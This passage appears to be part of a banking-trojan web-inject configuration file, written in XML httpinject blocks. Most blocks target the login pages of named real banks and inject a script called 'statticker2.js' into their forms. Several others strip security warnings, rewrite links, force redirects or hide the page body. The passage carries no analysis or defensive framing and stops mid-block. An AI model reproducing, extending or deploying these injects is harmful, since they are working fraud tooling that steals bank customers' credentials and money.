538. <httpinject>
539. <conditions>
540. <url type="allow" onpost="1" onget="1" modifiers="">^https://clientlogin\.ibb\.ubs\.com/login(\?|$)</url>
541. </conditions>
542. <actions>
543. <modify>
544. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
545. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
546. </modify>
547. </actions>
548. </httpinject>
549. <httpinject>
550. <conditions>
551. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.*/fi\d+/bb/logon</url>
552. </conditions>
553. <actions>
554. <modify>
555. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
556. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
557. </modify>
558. </actions>
559. </httpinject>
560. <httpinject>
561. <conditions>
562. <url type="allow" onpost="1" onget="1" modifiers="U">^https://bbo\.1stsource\.com/login\.cfm</url>
563. </conditions>
564. <actions>
565. <modify>
566. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
567. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
568. </modify>
569. </actions>
570. </httpinject>
571. <httpinject>
572. <conditions>
573. <url type="allow" onpost="1" onget="1" modifiers="U">^https://smallbusinessonline\.bbt\.com/auth/pwd\.tb</url>
574. </conditions>
575. <actions>
576. <modify>
577. <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
578. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
579. </modify>
580. </actions>
581. </httpinject>
582. <httpinject>
583. <conditions>
584. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\d*\.harrisbank\.com/(HOB/retail/logon/psohobdecidelogon|)</url>
585. </conditions>
586. <actions>
587. <modify>
588. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
589. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
590. </modify>
591. </actions>
592. </httpinject>
593. <httpinject>
594. <conditions>
595. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://commercial\.bnc\.ca/auth/Login</url>
596. </conditions>
597. <actions>
598. <modify>
599. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
600. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
601. </modify>
602. <modify>
603. <pattern modifiers="i"><![CDATA[(/scripts/sbiInput\d*\.js"></script>)]]></pattern>
604. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript">xdom.Events.Keys.ENTER = 27;</script>]]></replacement>
605. </modify>
606. </actions>
607. </httpinject>
608. <httpinject>
609. <conditions>
610. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.bxs\.com/</url>
611. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
612. </conditions>
613. <actions>
614. <modify>
615. <pattern modifiers="i"><![CDATA[(</(body|html)>)]]></pattern>
616. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
617. </modify>
618. </actions>
619. </httpinject>
620. <httpinject>
621. <conditions>
622. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://cashproonline\.bankofamerica\.com/AuthenticationFrameworkWeb/cpo/login/public/
623. </url>
624. </conditions>
625. <actions>
626. <modify>
627. <pattern modifiers="Ui"><![CDATA[(</html>)]]></pattern>
628. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
629. </modify>
630. </actions>
631. </httpinject>
632. <httpinject>
633. <conditions>
634. <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bankofthewest\.com/K\d+/(|sa\d+/login\.jsp|index\.html)(\?|$)</url>
635. </conditions>
636. <actions>
637. <modify>
638. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
639. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
640. </modify>
641. </actions>
642. </httpinject>
643. <httpinject>
644. <conditions>
645. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.brannenbanks\.com/BrannenBank/PassmarkSignIn\.faces</url>
646. </conditions>
647. <actions>
648. <modify>
649. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
650. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
651. </modify>
652. </actions>
653. </httpinject>
654. <httpinject>
655. <conditions>
656. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(vip\.|)btcchina\.com/bbs/index\.php</url>
657. </conditions>
658. <actions>
659. <modify>
660. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
661. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
662. </modify>
663. <modify>
664. <pattern modifiers="i"><![CDATA[Login\.init\(\);]]></pattern>
665. <replacement><![CDATA[]]></replacement>
666. </modify>
667. </actions>
668. </httpinject>
669. <httpinject>
670. <conditions>
671. <url type="allow" onpost="1" onget="1" modifiers="">^https://wired\d*\.businessmanager\.com/signon/signon\.do(\?|$)</url>
672. </conditions>
673. <actions>
674. <modify>
675. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
676. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
677. </modify>
678. </actions>
679. </httpinject>
680. <httpinject>
681. <conditions>
682. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.cibeg\.com/MCP</url>
683. </conditions>
684. <actions>
685. <modify>
686. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
687. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
688. </modify>
689. </actions>
690. </httpinject>
691. <httpinject>
692. <conditions>
693. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/cmserver/.*verify\.cfm</url>
694. </conditions>
695. <actions>
696. <modify>
697. <pattern modifiers="imsU"><![CDATA[(<form.+method\="post".*>)]]></pattern>
698. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
699. </modify>
700. </actions>
701. </httpinject>
702. <httpinject>
703. <conditions>
704. <url type="allow" onpost="1" onget="1" modifiers="">^https://business\-eb\.ibanking\-services\.com/K1/(sb\_login|index)\.jsp(\?|$)</url>
705. </conditions>
706. <actions>
707. <modify>
708. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
709. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
710. </modify>
711. <modify>
712. <pattern modifiers="Umsg"><![CDATA[<font color="red">.*</font>]]></pattern>
713. <replacement />
714. </modify>
715. </actions>
716. </httpinject>
717. <httpinject>
718. <conditions>
719. <url type="allow" onpost="1" onget="1" modifiers="">^https://.+/pub/html/(rsa/|pt/RSApm/|)(login|LoginRSAID|loginID)\.html$
720. </url>
721. </conditions>
722. <actions>
723. <modify>
724. <pattern modifiers="msi"><![CDATA[(</html>)]]></pattern>
725. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
726. </modify>
727. </actions>
728. </httpinject>
729. <httpinject>
730. <conditions>
731. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.membersaccounts\.com/SELFSERVICE/Login\.aspx</url>
732. </conditions>
733. <actions>
734. <modify>
735. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
736. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
737. </modify>
738. </actions>
739. </httpinject>
740. <httpinject>
741. <conditions>
742. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.cencorpcu\.com/secure/secure\_logon\.asp(\?|$)</url>
743. </conditions>
744. <actions>
745. <modify>
746. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
747. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
748. </modify>
749. </actions>
750. </httpinject>
751. <httpinject>
752. <conditions>
753. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https?://www.citibank.com/us/citibusinessonline/</url>
754. </conditions>
755. <actions>
756. <modify>
757. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
758. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>
759. <script type="text/javascript" language="JavaScript">
760. // redirect loop :(
761. //if (window.location.protocol != "https:")
762. window.location.href = "https:" + window.location.href.substring(window.location.protocol.length);
763. </script>
764. ]]></replacement>
765. </modify>
766. </actions>
767. </httpinject>
768. <httpinject>
769. <conditions>
770. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://online\.citibank\.com/</url>
771. </conditions>
772. <actions>
773. <modify>
774. <pattern modifiers="imsgU"><![CDATA[href="https://businessaccess.citibank.citigroup.com[^"]*"]]></pattern>
775. <replacement><![CDATA[href="http://www.citibank.com/us/citibusinessonline/"]]></replacement>
776. </modify>
777. </actions>
778. </httpinject>
779. <httpinject>
780. <conditions>
781. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fcsolb\.com/cb/pages/jsp\-ns/</url>
782. </conditions>
783. <actions>
784. <modify>
785. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
786. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
787. </modify>
788. </actions>
789. </httpinject>
790. <httpinject>
791. <conditions>
792. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d+\.comerica\.com/</url>
793. <url type="deny" onpost="0" onget="1" modifiers="U">^https://www\d+\.comerica\.com/.+\.(gif|png|jpg|js|css)($|\?)</url>
794. </conditions>
795. <actions>
796. <modify>
797. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
798. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
799. </modify>
800. </actions>
801. </httpinject>
802. <httpinject>
803. <conditions>
804. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.conexus\.ca/Business/OnlineBanking/Accounts/</url>
805. </conditions>
806. <actions>
807. <modify>
808. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
809. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
810. </modify>
811. </actions>
812. </httpinject>
813. <httpinject>
814. <conditions>
815. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://[\w\-]+\.corpower\.org/SecureLogonMultiAuth\.aspx($|\?)</url>
816. </conditions>
817. <actions>
818. <modify>
819. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
820. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
821. </modify>
822. </actions>
823. </httpinject>
824. <httpinject>
825. <conditions>
826. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\.|)cashanalyzer\.com/(caloadbalance\.aspx|cgi\-bin/[1-2a-z]+\.dll)(/|\?|$)</url>
827. </conditions>
828. <actions>
829. <modify>
830. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
831. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
832. </modify>
833. <modify>
834. <pattern modifiers="Ums"><![CDATA[class="CA_redText".*>(?<inject>.*)</div>]]></pattern>
835. <replacement />
836. </modify>
837. </actions>
838. </httpinject>
839. <httpinject>
840. <conditions>
841. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.e\-closingsecured\.com:\d+/scripts/spiis\.dll/its\-itec/itec\_login</url>
842. </conditions>
843. <actions>
844. <modify>
845. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
846. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
847. </modify>
848. </actions>
849. </httpinject>
850. <httpinject>
851. <conditions>
852. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)e\-moneyger\.com/wps/myportal/?(|/\!ut/p/.+/)$</url>
853. </conditions>
854. <actions>
855. <modify>
856. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
857. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
858. </modify>
859. </actions>
860. </httpinject>
861. <httpinject>
862. <conditions>
863. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/ebc_ebc1961/</url>
864. </conditions>
865. <actions>
866. <modify>
867. <pattern modifiers="Ui"><![CDATA[(</form.*>)]]></pattern>
868. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
869. </modify>
870. <modify>
871. <pattern modifiers="Ui"><![CDATA[(onload="loadPassmark\(\)\;)]]></pattern>
872. <replacement><![CDATA[\1document.cookie='nmRef='+escape(window.top.document.referrer);]]></replacement>
873. </modify>
874. </actions>
875. </httpinject>
876. <httpinject>
877. <conditions>
878. <url type="allow" onpost="1" onget="1" modifiers="U">^https://express\.53\.com/portal/auth/login/Login</url>
879. </conditions>
880. <actions>
881. <modify>
882. <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
883. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
884. </modify>
885. </actions>
886. </httpinject>
887. <httpinject>
888. <conditions>
889. <url type="allow" onpost="1" onget="1" modifiers="U">^https://direct\.53.com/direct/logon53Direct\.jsp</url>
890. </conditions>
891. <actions>
892. <modify>
893. <pattern modifiers="sm"><![CDATA[^(?<inject>.*)$]]></pattern>
894. <replacement><![CDATA[<html><head><title>Redirect</title></head>
895. <body>
896. <script language="JavaScript">window.top.location.href='https://express.53.com/portal/auth/login/Login'</script>
897. <a href="https://express.53.com/portal/auth/login/Login">redirect...</a>
898. </body></html>]]></replacement>
899. </modify>
900. </actions>
901. </httpinject>
902. <httpinject>
903. <conditions>
904. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bb\-fire\.com/SignOn/</url>
905. </conditions>
906. <actions>
907. <modify>
908. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
909. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
910. </modify>
911. </actions>
912. </httpinject>
913. <httpinject>
914. <conditions>
915. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.ffinonline\.com/ff.*online1/(authentication/Login\.aspx|Accounts/AccountOverview\.aspx)</url>
916. </conditions>
917. <actions>
918. <modify>
919. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
920. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
921. </modify>
922. </actions>
923. </httpinject>
924. <httpinject>
925. <conditions>
926. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://globalaccess\.firstglobal\-bank\.com/internetbanking/ENULogin\.jsp</url>
927. </conditions>
928. <actions>
929. <modify>
930. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
931. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
932. </modify>
933. </actions>
934. </httpinject>
935. <httpinject>
936. <conditions>
937. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fnbstl\.com/business/(cts\_security\_precheck|.+\.jsp)</url>
938. </conditions>
939. <actions>
940. <modify>
941. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
942. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
943. </modify>
944. </actions>
945. </httpinject>
946. <httpinject>
947. <conditions>
948. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.efirstbank\.com/centralAuth/jsp/main/Logon\.faces(\?|$)</url>
949. </conditions>
950. <actions>
951. <modify>
952. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
953. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
954. </modify>
955. </actions>
956. </httpinject>
957. <httpinject>
958. <conditions>
959. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.firstmeritib\.com</url>
960. </conditions>
961. <actions>
962. <modify>
963. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
964. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
965. </modify>
966. </actions>
967. </httpinject>
968. <httpinject>
969. <conditions>
970. <url type="allow" onpost="1" onget="1" modifiers="">^https://.*secure\.fundsxpress\.com/piles/fxweb\.pile/(fx|second\_auth.*|custom\_login)(\?|$)</url>
971. </conditions>
972. <actions>
973. <modify>
974. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
975. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
976. </modify>
977. </actions>
978. </httpinject>
979. <httpinject>
980. <conditions>
981. <url type="allow" onpost="1" onget="1" modifiers="iU">^^https://netbanking\.hdfcbank\.com/netbanking/</url>
982. </conditions>
983. <actions>
984. <modify>
985. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
986. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
987. </modify>
988. </actions>
989. </httpinject>
990. <httpinject>
991. <conditions>
992. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessonline\.huntington\.com/BOLHome/BusinessOnlineLogin\.aspx
993. </url>
994. </conditions>
995. <actions>
996. <modify>
997. <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
998. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
999. </modify>
1000. </actions>
1001. </httpinject>
1002. <httpinject>
1003. <conditions>
1004. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.huntington\.com/scripts/onlinebanking\.js
1005. </url>
1006. </conditions>
1007. <actions>
1008. <modify>
1009. <pattern modifiers="msU"><![CDATA[(inputCheckBusiness.*else {)]]></pattern>
1010. <replacement><![CDATA[\1top.location.href="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx"; return false;]]></replacement>
1011. </modify>
1012. </actions>
1013. </httpinject>
1014. <httpinject>
1015. <conditions>
1016. <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)">^https://www\.huntington\.com/
1017. </url>
1018. </conditions>
1019. <actions>
1020. <modify>
1021. <pattern modifiers="i"><![CDATA[<a href="#businessLogin" class="pill-nav__pill" role="tab" aria-controls="businessLogin"]]></pattern>
1022. <replacement><![CDATA[<a href="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx" class="pill-nav__pill"]]></replacement>
1023. </modify>
1024. </actions>
1025. </httpinject>
1026. <httpinject>
1027. <conditions>
1028. <url type="allow" onpost="1" onget="1" modifiers="U">^https://access\.jpmorgan\.com/jpmalogon</url>
1029. </conditions>
1030. <actions>
1031. <modify>
1032. <pattern modifiers="sA"><![CDATA[(.+</body>)]]></pattern>
1033. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1034. </modify>
1035. </actions>
1036. </httpinject>
1037. <httpinject>
1038. <conditions>
1039. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.jefferson\-bank\.com/business/j\_security\_check($|\?)</url>
1040. </conditions>
1041. <actions>
1042. <modify>
1043. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1044. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1045. </modify>
1046. </actions>
1047. </httpinject>
1048. <httpinject>
1049. <conditions>
1050. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.(wblnk|blilk)\.com/Core/Authentication/MFAPassword\.aspx</url>
1051. <url type="deny" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
1052. </conditions>
1053. <actions>
1054. <modify>
1055. <pattern modifiers="imsU"><![CDATA[(<body.*>)]]></pattern>
1056. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1057. </modify>
1058. </actions>
1059. </httpinject>
1060. <httpinject>
1061. <conditions>
1062. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
1063. </conditions>
1064. <actions>
1065. <modify>
1066. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1067. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="idbaccess/scripts/statticker2.js"></script>\1]]></replacement>
1068. </modify>
1069. </actions>
1070. </httpinject>
1071. <httpinject>
1072. <conditions>
1073. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logon]]></url>
1074. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
1075. </conditions>
1076. <actions>
1077. <modify>
1078. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1079. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1080. </modify>
1081. </actions>
1082. </httpinject>
1083. <httpinject>
1084. <conditions>
1085. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logonFromKeyComNew]]></url>
1086. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
1087. </conditions>
1088. <actions>
1089. <modify>
1090. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1091. <replacement><![CDATA[\1
1092. <style type="text/css">
1093. body { visibility: hidden; }
1094. </style>
1095. <script type="text/javascript">
1096. top.window.location = 'https://ktt.key.com/ktt/cmd/logon';
1097. </script>]]></replacement>
1098. </modify>
1099. </actions>
1100. </httpinject>
1101. <httpinject>
1102. <conditions>
1103. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessportal\.mibank\.com/oracleAccessManager/securid\-forms\-adforest/.*login.*\.html(\?|$)</url>
1104. </conditions>
1105. <actions>
1106. <modify>
1107. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1108. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
1109. </modify>
1110. </actions>
1111. </httpinject>
1112. <httpinject>
1113. <conditions>
1114. <url type="allow" onpost="1" onget="1" modifiers="">^https://commercialservices\.mandtbank\.com/</url>
1115. </conditions>
1116. <actions>
1117. <modify>
1118. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1119. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1120. </modify>
1121. <modify>
1122. <pattern modifiers=""><![CDATA[Internet Security Reminder]]></pattern>
1123. <replacement><![CDATA[]]></replacement>
1124. </modify>
1125. <modify>
1126. <pattern modifiers="sU"><![CDATA[<font color=black size="1">.*</div>]]></pattern>
1127. <replacement><![CDATA[</div>]]></replacement>
1128. </modify>
1129. <modify>
1130. <pattern modifiers="sU"><![CDATA[<hr .*>]]></pattern>
1131. <replacement><![CDATA[]]></replacement>
1132. </modify>
1133. </actions>
1134. </httpinject>
1135. <httpinject>
1136. <conditions>
1137. <url type="allow" onpost="1" onget="1" modifiers="">^https://business\.memberdirect\.net/(servlet/Logon|business/default\.jsp)(\?|$)</url>
1138. </conditions>
1139. <actions>
1140. <modify>
1141. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1142. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1143. </modify>
1144. </actions>
1145. </httpinject>
1146. <httpinject>
1147. <conditions>
1148. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mercantilcbonline\.com/secure/banking/(logon|individualLogon)</url>
1149. </conditions>
1150. <actions>
1151. <modify>
1152. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1153. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1154. </modify>
1155. </actions>
1156. </httpinject>
1157. <httpinject>
1158. <conditions>
1159. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.ml\.com/ClientFederation/Loginwidget\.aspx</url>
1160. </conditions>
1161. <actions>
1162. <modify>
1163. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1164. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1165. </modify>
1166. </actions>
1167. </httpinject>
1168. <httpinject>
1169. <conditions>
1170. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.metrobankdirect\.com/corp_login_page\.asp</url>
1171. </conditions>
1172. <actions>
1173. <modify>
1174. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1175. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1176. </modify>
1177. </actions>
1178. </httpinject>
1179. <httpinject>
1180. <conditions>
1181. <url type="allow" onpost="1" onget="1" modifiers="U">^https://cashmanager\.mizuhoe\-treasurer\.com/mz/servlet/SLogin\?</url>
1182. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://otp\.ffrontier\.com/gcms/(FFrontier|user\.login)(\?|$)</url>
1183. </conditions>
1184. <actions>
1185. <modify>
1186. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1187. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1188. </modify>
1189. </actions>
1190. </httpinject>
1191. <httpinject>
1192. <conditions>
1193. <url type="allow" onpost="1" onget="1" modifiers="U">^https://businessonline\.mutualofomahabank\.com/cb/pages/jsp\-ns/login\.jsp</url>
1194. </conditions>
1195. <actions>
1196. <modify>
1197. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
1198. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1199. </modify>
1200. </actions>
1201. </httpinject>
1202. <httpinject>
1203. <conditions>
1204. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\d*|cm)\.netteller\.com/(login|cm)2008/Authentication/Views/\S+\.aspx(\?|$)</url>
1205. </conditions>
1206. <actions>
1207. <modify>
1208. <pattern modifiers="msU"><![CDATA[(</form.*>)]]></pattern>
1209. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1210. </modify>
1211. </actions>
1212. </httpinject>
1213. <httpinject>
1214. <conditions>
1215. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/passmark.*/.+\.asp($|\?)</url>
1216. </conditions>
1217. <actions>
1218. <modify>
1219. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1220. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1221. </modify>
1222. </actions>
1223. </httpinject>
1224. <httpinject>
1225. <conditions>
1226. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/OOBA/OOBALogin\.asp($|\?)</url>
1227. </conditions>
1228. <actions>
1229. <modify>
1230. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1231. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1232. </modify>
1233. </actions>
1234. </httpinject>
1235. <httpinject>
1236. <conditions>
1237. <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/onlineserv/CM/($|index\.cgi)</url>
1238. </conditions>
1239. <actions>
1240. <modify>
1241. <pattern modifiers="imsU"><![CDATA[(action="index.cgi".+</form>)]]></pattern>
1242. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1243. </modify>
1244. </actions>
1245. </httpinject>
1246. <httpinject>
1247. <conditions>
1248. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.+/onlineserv/CM/adminLogin\.cgi</url>
1249. </conditions>
1250. <actions>
1251. <modify>
1252. <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
1253. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="onlineservadmin/scripts/statticker2.js"></script>]]></replacement>
1254. </modify>
1255. </actions>
1256. </httpinject>
1257. <httpinject>
1258. <conditions>
1259. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.pnc\.com/.*corporate\-and\-institutional</url>
1260. </conditions>
1261. <actions>
1262. <modify>
1263. <pattern modifiers="msU"><![CDATA[(</html>)]]></pattern>
1264. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
1265. </modify>
1266. </actions>
1267. </httpinject>
1268. <httpinject>
1269. <conditions>
1270. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.*(/PassMark|RSAToken).*\.aspx($|\?)</url>
1271. </conditions>
1272. <actions>
1273. <modify>
